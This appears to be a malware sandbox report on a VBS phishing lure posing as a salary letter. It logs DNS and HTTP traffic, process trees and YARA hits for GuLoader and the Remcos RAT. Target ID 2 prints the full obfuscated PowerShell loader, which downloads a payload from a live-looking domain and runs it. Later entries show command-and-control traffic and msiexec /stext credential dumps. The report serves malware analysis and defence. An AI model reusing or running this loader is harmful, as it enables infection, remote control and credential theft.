                                                                                      Oct 10, 2024 09:28:07.003681898 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:07.008805037 CEST240449926154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:07.008853912 CEST499262404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:22.354639053 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:22.363168955 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:22.368024111 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:52.462934017 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:28:52.463992119 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:28:52.468844891 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:29:22.567559958 CEST240449915154.216.17.14192.168.2.6
                                                                                      Oct 10, 2024 09:29:22.568941116 CEST499152404192.168.2.6154.216.17.14
                                                                                      Oct 10, 2024 09:29:22.573823929 CEST240449915154.216.17.14192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 09:27:23.285386086 CEST | 61730 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 09:27:23.299973965 CEST | 53 | 61730 | 1.1.1.1 | 192.168.2.6
Oct 10, 2024 09:28:01.167943001 CEST | 59181 | 53 | 192.168.2.6 | 1.1.1.1
Oct 10, 2024 09:28:01.175317049 CEST | 53 | 59181 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2024 09:27:23.285386086 CEST | 192.168.2.6 | 1.1.1.1 | 0x4334 | Standard query (0) | ln6b9.shop | A (IP address) | IN (0x0001) | false
Oct 10, 2024 09:28:01.167943001 CEST | 192.168.2.6 | 1.1.1.1 | 0x8401 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 10, 2024 09:27:23.299973965 CEST | 1.1.1.1 | 192.168.2.6 | 0x4334 | No error (0) | ln6b9.shop | - | 104.21.2.6 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 09:27:23.299973965 CEST | 1.1.1.1 | 192.168.2.6 | 0x4334 | No error (0) | ln6b9.shop | - | 172.67.128.117 | A (IP address) | IN (0x0001) | false
Oct 10, 2024 09:28:01.175317049 CEST | 1.1.1.1 | 192.168.2.6 | 0x8401 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                      • ln6b9.shop
                                                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49712 | 104.21.2.6 | 80 | 948 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 09:27:23.310188055 CEST | 178 | OUT | GET /IBodHWPw/Kokkerering.ocx HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                      Host: ln6b9.shop
                                                                                      Connection: Keep-Alive
Oct 10, 2024 09:27:23.926213980 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 10 Oct 2024 07:27:23 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3ubXfba15N6ot1V5XKOf%2FSPnDhn9bFYkqIkK5r6k3EMaYSJBEVgQL0s7mOB%2FUmLS3BhKg4Sd0UwNIEWjwN8%2FtG%2Bcn2JfpziYVsKvDW3qKm95xZJnJeR%2Buf8yqXZ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d04e33d39167289-EWR
                                                                                      alt-svc: h2=":443"; ma=60
                                                                                      Data Ascii: CSh1+wJlv3W9WbRxJUmMUZrnzeIfuxuUReQvQZJsw9iQhdwLx6Zrwdd/b59v60+rvolM+FAhbqUXvWeujk1tRdSYZf0MA9L1szYd4696UREhN1XTXBo9bSYuOpe2cpPQFMPbJL42rcDlQRStbmUzr9mv2T6q2Z8Pv5R1Vp0eQ5vZWw3O5QugVZD59d0JI8pAxyWQ5pDBSNihN21ZoRKN45hl8OJcAb1jKTjcJUUvRUrK2jtVjVH
                                                                                      Oct 10, 2024 09:27:23.931565046 CEST1114INData Raw: 4a 61 39 50 6c 34 6a 78 4f 44 65 39 34 76 4e 36 59 63 6a 34 5a 51 47 70 59 33 76 38 42 4a 35 41 43 69 2f 49 54 59 45 6f 7a 4d 54 35 49 6c 45 6e 67 4a 6d 51 38 32 4e 36 2f 49 48 66 70 56 66 4e 37 38 74 75 66 33 4d 6c 54 52 34 56 48 47 4f 4a 46 52
                                                                                      Data Ascii: Ja9Pl4jxODe94vN6Ycj4ZQGpY3v8BJ5ACi/ITYEozMT5IlEngJmQ82N6/IHfpVfN78tuf3MlTR4VHGOJFRZL9kYREGqYBHETZRZE2B6kcGmQ0O2lGBDg6+0aMaZgrkj65ZhVqQLmmqMrlBjVY41iGmuu75TWIQbAO6gxacdRZPBiZVAQGDKTv1c1wGrKpNfflReWVwao4GtDTWGBSBDg6+2YsaOVVj/11vLIlbmPrQSBoAbBkBL


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.6 | 49893 | 104.21.2.6 | 80 | 3976 | C:\Windows\SysWOW64\msiexec.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Oct 10, 2024 09:27:55.860023022 CEST | 187 | OUT | GET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                      Host: ln6b9.shop
                                                                                      Cache-Control: no-cache
                                                                                      Oct 10, 2024 09:27:56.635476112 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Date: Thu, 10 Oct 2024 07:27:56 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: max-age=14400
                                                                                      CF-Cache-Status: EXPIRED
                                                                                      Last-Modified: Thu, 10 Oct 2024 07:27:56 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3zlE7L4Zx6NbYN6rScFhtp%2B9c2G1fuG%2FRAIU6773SMFuYayO0w9zalbCkC%2BX7y%2BZaTZ77NodU6HT2S1np7sm6RDWjf2Liwx%2FuxSV6rAo6kP0TUObijQy5%2FaUDBp"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d04e408bf864225-EWR
                                                                                      alt-svc: h2=":443"; ma=60


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      2 | 192.168.2.6 | 49927 | 178.237.33.50 | 80 | 3976 | C:\Windows\SysWOW64\msiexec.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Oct 10, 2024 09:28:01.182200909 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                      Host: geoplugin.net
                                                                                      Cache-Control: no-cache
                                                                                      Oct 10, 2024 09:28:01.781619072 CEST | 1170 | IN | HTTP/1.1 200 OK
                                                                                      date: Thu, 10 Oct 2024 07:28:01 GMT
                                                                                      server: Apache
                                                                                      content-length: 962
                                                                                      content-type: application/json; charset=utf-8
                                                                                      cache-control: public, max-age=300
                                                                                      access-control-allow-origin: *
                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                                                                      Target ID:0
                                                                                      Start time:03:27:18
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
                                                                                      Imagebase:0x7ff6bc840000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:03:27:19
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. 
stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl 
BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"
                                                                                      Imagebase:0x7ff6e3d50000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:03:27:19
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:03:27:27
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" with the same script argument as the Commandline of Target ID:2 above
                                                                                      Imagebase:0x180000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2508157288.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2486668247.000000000552C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2508605979.0000000009345000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:03:27:28
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:03:27:46
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:10
                                                                                      Start time:03:28:01
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:03:28:01
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:03:28:02
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
                                                                                      Imagebase:0x730000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                        • Instruction Fuzzy Hash: 32310A30A1868E8EFBB8AF14CC7ABF93290FF42715F410139D54DC6196CBB869A5DB11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa2e404063144987be05b6185f9e32254046bc2bd8f7c152b242e60bb74e73b6
                                                                                        • Instruction ID: 9ad5b91a623ef303a3ac216df625ef9379d62b7184bb8f58d585500a5f03f010
                                                                                        • Opcode Fuzzy Hash: aa2e404063144987be05b6185f9e32254046bc2bd8f7c152b242e60bb74e73b6
                                                                                        • Instruction Fuzzy Hash: EA212356F0E9CA0FE76A972C18B91746BC1EF5A350B4805BED09DC71DBCC1E58068352
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 545e9c8844bdb0bc558d94f749993f00fc34096500d33e97e86dfe21a8b956c8
                                                                                        • Instruction ID: 1334cb8ba2523d44fa2d14546a0808c5769743df89b5a85b7fe33d4a1852b0bb
                                                                                        • Opcode Fuzzy Hash: 545e9c8844bdb0bc558d94f749993f00fc34096500d33e97e86dfe21a8b956c8
                                                                                        • Instruction Fuzzy Hash: 8A01A73020CB0C4FDB44EF0CE051AA5B3E0FB95324F10052DE58AC3665D636E892CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 548df0e088e375577c08fe49e8e097fc2ea115f4c7f0ec23f2d5f71e5a84f07f
                                                                                        • Instruction ID: 8215bb4115b787a7c6fae7de3f72c23e528842744f59f4b1b826e40296520274
                                                                                        • Opcode Fuzzy Hash: 548df0e088e375577c08fe49e8e097fc2ea115f4c7f0ec23f2d5f71e5a84f07f
                                                                                        • Instruction Fuzzy Hash: 60F0ED2BB0CA0C0AE7A6976C58552F9B3D2EFC9132B550277C14ED3156ED26E8564250
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction ID: 89cf1ad2bea5ebe70d750e6998290b97063cb355ba1902e59ce2c3dc3ae481ed
                                                                                        • Opcode Fuzzy Hash: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction Fuzzy Hash: 6BF08C32B099484FDF95EB6898555E9B7F1FF68311B0000BAE00AD31A2DE28A8588B81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction ID: 86ee8b78ae5826fa5f0ef8b7c2a989cee63856928a39443c2b93276abec47302
                                                                                        • Opcode Fuzzy Hash: b026203efad94641c1c7aa0bba043ce7ae0b86c5f2547ad0f4406dfe0ba3e448
                                                                                        • Instruction Fuzzy Hash: 0BF08C32B099484FDF95EF6898555E9B7F0FF68311B0000BBE00AD3162DE28AC588781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b900196d67be6062472e7b0dfbe84324ca0aa8ceaaa2ded74ca7553fc3f4dd6c
                                                                                        • Instruction ID: 142fcf5d3ecace35b78da45a9aa6feb3d10710e34e6c178b10ba83dafe408f5f
                                                                                        • Opcode Fuzzy Hash: b900196d67be6062472e7b0dfbe84324ca0aa8ceaaa2ded74ca7553fc3f4dd6c
                                                                                        • Instruction Fuzzy Hash: D0E04877F1DA0509FB59566C68621F9B3D2DF85121744147FD24EC2447D81AA8164245
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333730795.00007FFD34500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34500000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34500000_powershell.jbxd
